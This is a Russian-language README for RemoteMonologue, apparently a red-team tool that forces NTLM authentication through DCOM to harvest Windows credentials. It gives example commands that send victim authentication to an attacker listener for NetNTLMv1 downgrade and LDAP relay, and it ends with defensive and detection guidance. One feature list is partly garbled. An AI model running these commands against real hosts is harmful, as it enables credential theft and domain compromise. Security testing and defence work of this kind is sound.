
Вооружение DCOM для принуждения к NTLM-аутентификации
RemoteMonologue — это техника сбора учётных данных Windows, которая позволяет удалённо скомпрометировать пользователя, используя раздел реестра Interactive User RunAs и принудительные NTLM-аутентификации через DCOM.
Подробную информацию читайте в статье X-Force Red RemoteMonologue: применение DCOM для принудительных NTLM-аутентификаций.
🔹 Принудительная аутентификация через DCOM (-dcom)
ServerDataCollectorSet, FileSystemImage, MSTSWebProxy, UpdateSession) для запуска NTLM-аутентификации против указанного слушателя (-auth-to).🔹 Перебор учётных данных (-spray)
🔹 Атака с понижением до NetNTLMv1 (-downgrade)
🔹 Злоупотребление службой WebClient (-webclient)
🔹 Перечисление пользователей (-query)
Примечание: Требуются права локального администратора на целевой системе.
pip install impacket
Ниже приведён пример запуска RemoteMonologue с атакой понижения до NetNTLMv1 с использованием Responder в качестве слушателя. По умолчанию, если параметр DCOM не указан, инструмент использует объект DCOM ServerDataCollectorSet.
RemoteMonologue.py domain/user:password@target -auth-to [listener IP] -downgrade

Ниже ещё один пример: на этот раз атака выполняется с использованием объекта DCOM FileSystemImage и включением службы WebClient для получения HTTP-аутентификации, которая затем ретранслируется в LDAP с помощью ntlmrelayx.
RemoteMonologue.py domain/user:password@target -auth-to [listener NETBIOS@PORT] -webclient -dcom FileSystemImage

Для защиты от этих техник и их обнаружения можно внедрить несколько профилактических и детектирующих мер.
Профилактические меры:
Включите подпись LDAP и привязку канала: настройте принудительное подписание LDAP и привязку канала на контроллерах домена для защиты конечной точки LDAP от атак с ретрансляцией. Примечание: начиная с Windows Server 2025 эти параметры будут применяться по умолчанию.
Переходите на последние версии Windows: обновите серверы до Windows Server 2025, а рабочие станции — до Windows 11 версии 24H2, чтобы снизить риск атак понижения до NetNTLM, поскольку NTLMv1 удалён в этих версиях.
Принудительно включайте подпись SMB: включите и применяйте подпись SMB на серверах Windows для предотвращения атак ретрансляции SMB.
Внедряйте надёжные политики паролей: применяйте требования к надёжным паролям, чтобы усложнить атаки по взлому паролей.
Возможности обнаружения:
Отслеживайте удалённый доступ к объектам DCOM: регистрируйте доступ к затронутым объектам DCOM и их конкретным свойствам и методам для выявления подозрительной активности.
Отслеживайте изменения в реестре: контролируйте изменения разделов реестра RunAs и LmCompatibilityLevel.
Следите за активностью службы WebClient: отслеживайте случаи удалённого включения службы WebClient, поскольку она используется для облегчения HTTP-аутентификации NTLM.